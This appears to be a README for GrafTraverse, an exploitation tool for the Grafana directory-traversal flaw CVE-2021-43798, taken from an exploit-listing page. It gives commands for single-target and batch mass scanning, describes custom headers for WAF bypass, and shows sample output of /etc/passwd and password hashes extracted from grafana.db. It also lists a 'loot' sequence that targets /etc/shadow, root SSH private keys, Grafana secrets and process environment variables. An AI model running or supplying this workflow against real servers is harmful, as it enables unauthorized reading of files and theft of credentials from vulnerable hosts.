Share
## https://sploitus.com/exploit?id=C745DD53-7AE4-5A94-B669-C401DB0C0BAB
# GrafTraverse - CVE-2021-43798 MiNi Exploitation Framework
> **Command-line automation tool for authorized security testing of Grafana Directory Traversal (CVE-2021-43798).**
---
## Overview
[](Banner )
**CVE-2021-43798** is an unauthenticated directory traversal vulnerability in Grafana 8.x that allows attackers to read arbitrary files on the underlying filesystem via the `/public/plugins/` endpoint. The root cause is improper path sanitization on plugin asset requests, enabling `../` sequences to escape the intended directory.
**GrafTraverse** is a complete rewrite of the original proof-of-concept. It fixes critical request-handling bugs, adds multi-threaded batch scanning, automatic plugin discovery, credential extraction, and structured reporting โ making it a production-grade tool for red teams and penetration testers.
---
## Features
| Feature | Description |
|---------|-------------|
| **Multi-Plugin Brute-Force** | Automatically probes 40+ built-in plugins to find a vulnerable path |
| **Interactive Mode** | Menu-driven single-target exploitation with live file preview |
| **Batch Mode** | Concurrent multi-target scanning with configurable thread workers |
| **Wordlist Mode** | Deep file enumeration using custom wordlists |
| **Auto Hash Extraction** | Automatically extracts PBKDF2 password hashes from downloaded `grafana.db` |
| **Structured Logging** | Export results to **JSON** and **CSV** for seamless reporting |
| **Proxy Support** | Route traffic through Burp, ZAP, or any HTTP proxy (`--proxy`) |
| **Custom Headers** | Inject arbitrary headers for WAF bypass or auth tokens (`-H`) |
| **Traversal Customization** | Override default traversal depth for non-standard environments (`--depth`) |
| **Smart Filtering** | Eliminates false-positives by rejecting plugin JS/CSS/HTML responses |
| **Zero Dependencies** | Only requires `requests` (pre-installed on Kali / Parrot) |
---
## Installation
```bash
# Clone the repository
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse
# Ensure requests is available (it ships with Kali)
pip3 install requests
# Make executable
chmod +x GrafTraverse.py
```
---
## Usage
GrafTraverse uses a **subcommand-based CLI**. All commands support `--help`.
### 1. Interactive Single Target
Launch the interactive menu against one host:
```bash
python3 GrafTraverse.py single -u http://IP:PORT
```
```
============================================================
INTERACTIVE MODE
============================================================
1. /etc/passwd
2. grafana.ini
3. grafana.db
4. Custom path
5. Full automated loot
6. Scan plugins
7. Exit
============================================================
```
### 2. Plugin Scan
Quickly identify which plugin endpoint is vulnerable without exploitation:
```bash
python3 GrafTraverse.py scan -u http://target:PORT
```
### 3. Batch Scanning
Load targets from a file and process them concurrently:
```bash
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv
```
**`targets.txt` format:**
```
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# Lines starting with # are ignored
```
### 4. Wordlist Enumeration
Feed a custom file list for deep traversal:
```bash
python3 GrafTraverse.py single -u http://target:3000 --wordlist sensitive_files.txt --output-dir ./loot --json log.json
```
### 5. Proxy & Custom Headers
Route through Burp Suite and add custom headers:
```bash
python3 GrafTraverse.py single -u http://target:3000 --proxy http://127.0.0.1:8080 -H "X-Forwarded-For: 127.0.0.1" -H "Authorization: Bearer eyJ0..."
```
---
## Command Reference
### `single`
| Flag | Description |
|------|-------------|
| `-u, --url` | Target URL (required) |
| `--no-download` | View-only mode, do not save files |
| `-t, --timeout` | Request timeout in seconds (default: 10) |
| `--proxy` | HTTP/HTTPS proxy URL |
| `-H, --header` | Custom header (repeatable) |
| `--depth` | Traversal string (default: `../../../../../../../../`) |
| `--output-dir` | Directory to save retrieved files |
| `--json` | Append results to JSON log file |
| `--csv` | Append results to CSV log file |
| `--wordlist` | File containing paths to enumerate |
| `--plugin` | Force a specific plugin name |
### `batch`
| Flag | Description |
|------|-------------|
| `-l, --list` | File with target URLs (required) |
| `--workers` | Concurrent threads (default: 5) |
| *(all `single` flags supported)* |
### `scan`
| Flag | Description |
|------|-------------|
| `-u, --url` | Target URL (required) |
| *(all network flags supported)* |
---
## Example Output
### Successful File Retrieval
```
[+] Output: 20260526_GrafTraverse
[*] Testing: /etc/passwd (via alertlist)
[+] SUCCESS: /etc/passwd (1874 bytes)
------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd
```
### Grafana DB Hash Extraction
```
[*] Testing: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCCESS: /var/lib/grafana/grafana.db (98304 bytes)
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extracted 3 password hashes:
admin:PBKDF2$sha256$10000$...base64...
editor:PBKDF2$sha256$10000$...base64...
viewer:PBKDF2$sha256$10000$...base64...
```
---
## Target Files (Automated Loot)
The built-in loot sequence attempts to retrieve the following files in order:
| File | Type | Sensitivity |
|------|------|-------------|
| `/etc/passwd` | Text | User enumeration |
| `/etc/shadow` | Text | Password hashes (rarely readable) |
| `/etc/hosts` | Text | Network topology |
| `/etc/hostname` | Text | Host identification |
| `/etc/grafana/grafana.ini` | Text | Grafana secrets & DB credentials |
| `/var/lib/grafana/grafana.db` | Binary | SQLite DB with user hashes & API keys |
| `/var/log/grafana/grafana.log` | Text | Operational intelligence |
| `/root/.ssh/id_rsa` | Text | SSH private key |
| `/root/.ssh/authorized_keys` | Text | Key-based access mapping |
| `/proc/self/environ` | Text | Process environment variables |
| `/proc/self/cmdline` | Text | Process arguments |
| `/proc/version` | Text | Kernel version |
| `/proc/mounts` | Text | Filesystem layout |
| `/etc/os-release` | Text | OS identification |
| `/etc/issue` | Text | OS identification |
| `/etc/crontab` | Text | Scheduled tasks |
| `/etc/resolv.conf` | Text | DNS configuration |
---
## Affected Versions
- Grafana **8.0.0** through **8.3.0**
- Patched in **8.3.1** and **7.5.12**